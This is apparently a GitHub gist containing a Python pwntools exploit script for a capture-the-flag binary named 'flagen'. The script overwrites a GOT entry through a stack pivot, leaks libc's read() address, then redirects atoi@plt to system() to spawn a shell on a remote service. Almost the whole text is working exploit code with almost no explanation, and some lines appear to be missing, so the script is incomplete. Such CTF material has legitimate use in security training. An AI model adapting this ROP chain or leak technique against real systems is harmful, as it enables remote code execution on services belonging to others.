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Last active August 29, 2015 14:18
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  • Save ancat/b8871734b830dd25a355 to your computer and use it in GitHub Desktop.
Save ancat/b8871734b830dd25a355 to your computer and use it in GitHub Desktop.
from pwn import *
import sys
lei = lambda x: struct.pack('I', x);
stack_chk = 0x0804B01C # location of stack_chk in the got
ret = 0x08048D89 # stack pivot (sub esp, 0x1c; pop; pop; pop; pop; ret;)
live = True
if live:
r = remote('', 5149)
read_offset = 0xDABD0 # offset of read() into remote libc
_system = 0x00040190 # offset of system() into remote libc
r = remote('localhost', 5556)
read_offset = 0xDB460 # offset of read() in my libc
_system = 0x00040100 # offset of system() in my libc
# run ./ to automagically attach gdb to the process currently processing my request
x=open('', 'w'); x.write('#!/bin/sh\n'+"gdb -p %d -x gdbinit\n" % (proc.pid_by_name('flagen')[0]));x.close()
raw_input("gdb -p %d -x gdbinit\n" % (proc.pid_by_name('flagen')[0]))
print r.recvuntil("Your choice: ")
rop_chain = ''.join([
lei(0x7c7c7c7c), # padding because of stack pivot
lei(0x7c7c7c7c), # more padding because of stack pivot
lei(0x08048510), # puts
lei(0x08048d8e), # pop pop ret
lei(0x0804b00c), # read@got.plt
lei(0x44444444), # pad
lei(0x080486CB), # read_input(their wrapper)
lei(0x08048d8e), # pop pop ret
lei(0x0804b03c), # destination (atoi@got.plt) where pointer to system goes
lei(0x11111111), # bytes to read (integer needs to have no null bytes, doesn't really matter)
lei(0x080486CB), # read_input(their wrapper)
lei(0x08048d8e), # pop pop ret
lei(0x0804B040), # the destination where our command string goes
lei(0x11111111), # bytes to read
lei(0x08048560), # atoi@plt (replaced with system)
lei(0x44444444), # doesn't matter, /bin/sh is ours now
lei(0x0804B040), # the place we wrote our command to
rop_chain = rop_chain + '|'*(77-len(rop_chain))
payload = lei(ret) + rop_chain + 'H'*65 + lei(stack_chk)
print len(rop_chain)
print len(payload + '\n')
assert(len(rop_chain) == 77)
assert(len(payload) <= 256)
r.send(payload + '\n')
raw_input("SENDING DA SPLOIT")
r.recvuntil("Your choice: ")
read_addr = int("0x"+r.recvuntil("\n")[:4][::-1].encode('hex'),16)
print "read located at %x"%(read_addr)
new_system = read_addr-read_offset+_system
print "system is located at %x"%(new_system)
print "sending butt"
print "sent butt"
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